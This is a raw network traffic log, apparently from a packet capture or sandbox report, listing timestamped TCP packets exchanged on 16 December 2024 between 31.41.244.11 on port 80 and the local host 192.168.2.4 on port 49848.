                                                                                                                                                                                              Dec 16, 2024 01:01:43.705409050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.705481052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.705540895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.705594063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.706584930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.706639051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837083101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837150097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837152004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837210894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837388039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837444067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837524891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837577105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837622881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.837771893 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.838998079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.839023113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.839051008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.839082956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.839951992 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.840003967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.840037107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.840131998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.841434002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.841451883 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.841483116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.841516972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.842485905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.842503071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.842550039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.843532085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.843585968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.843600988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.843645096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.844712019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.844763041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.844810009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.844885111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.846029043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.846046925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.846077919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.846106052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.847152948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.847181082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.847230911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.848345041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.848468065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.848519087 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.849503040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.849554062 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.849560022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.850398064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.850641012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.850697994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.850774050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.850835085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.851958990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.851994991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.852042913 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.853040934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.853143930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.853200912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.854355097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.854393005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.854410887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.855145931 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.855398893 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.855448961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.855535984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.855585098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.856601954 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.856653929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.856728077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.856775045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.857852936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.857906103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.857955933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.858020067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.859066963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.859121084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.859128952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.860210896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.860263109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.860311985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.861381054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.861433029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.861489058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.861536980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.862607956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.862787962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.862839937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.863778114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.863883972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.863938093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.864949942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.864995003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.865070105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.866117001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.866174936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.866360903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.866411924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.867372990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.867389917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.867435932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.868793011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.868809938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.868856907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870076895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870094061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870122910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870155096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870913029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.870956898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.871011972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.871054888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.872176886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.872194052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.872237921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.873306036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.873573065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.873615026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.874643087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.874659061 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.874685049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.874731064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.875699997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.875726938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.875781059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.876982927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.877000093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.877051115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.878036976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.878082991 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.878212929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.879144907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.879193068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.879234076 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.879272938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.879329920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.880403996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.880464077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.880654097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.881784916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.881800890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.881834030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.881866932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.882895947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.882913113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.882949114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.884008884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.884143114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.884190083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.885225058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.885277033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.885330915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.886377096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.886425018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.886522055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.887150049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.887624979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.887671947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.887727022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.887770891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.888736010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.888783932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.888839006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.888891935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.889915943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.889961004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.890049934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.890094995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.891122103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.891295910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.891345978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.892297029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.892515898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.892563105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.893512011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.893558025 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.893587112 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.894761086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.894805908 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.894857883 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.895149946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.895942926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.895961046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.896008015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.897043943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.897217035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.897239923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.897269964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.898277998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.898329020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.898379087 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.029495001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.029517889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.029742956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.029743910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.030081034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.030105114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.030139923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.030139923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.031203032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.031220913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.031250954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.031284094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.032294989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.032345057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.040872097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.040937901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.040999889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.041049004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.041280031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.041328907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.041384935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.041431904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.042449951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.042505026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.042599916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.042649031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.043894053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.043912888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.043951035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.043991089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.044984102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.045001984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.045039892 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.045073986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.046041012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.046092033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.046379089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.046435118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.047205925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.047262907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.047334909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.047388077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.048391104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.048443079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.048466921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.048513889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.049575090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.049624920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.049706936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.049753904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.051035881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.051053047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.051084995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.051115990 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.052159071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.052175999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.052206993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.052239895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.053150892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.053199053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.053229094 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.053275108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.054302931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.054351091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.054502964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.054548979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.055536032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.055583000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.055639029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.055685997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.056694984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.056744099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.056807995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.056853056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.057893991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.057954073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.058023930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.058073044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.059130907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.059184074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.059365988 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.059412003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.060242891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.060287952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.060334921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.060381889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.061402082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.061450005 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.061516047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.061562061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.062640905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.062705994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.062760115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.062808037 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.064079046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.064096928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.064131975 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.064131975 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.065159082 CET804984831.41.244.11192.168.2.4
